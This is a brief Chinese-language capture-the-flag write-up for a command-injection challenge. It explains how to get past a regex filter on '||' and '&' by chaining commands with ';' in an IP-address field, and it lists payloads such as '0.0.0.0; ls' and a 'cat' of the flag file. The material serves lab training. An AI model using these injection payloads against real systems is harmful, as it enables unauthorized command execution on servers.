题目描述

过滤了几个运算符, 要怎么绕过呢。

Solution

打开网页,可以看到后端源代码:

1.png

由源代码可知,后端用了正则匹配过滤了||&符号,我们可以先试试用|看行不行:

  1. 0.0.0.0 | ls

2.png

没有成功,我们还可以用;去执行多个命令:

  1. 0.0.0.0; ls

3.png

把 Flag 打印出来:

  1. 0.0.0.0; cat flag_290110992653.php

4.png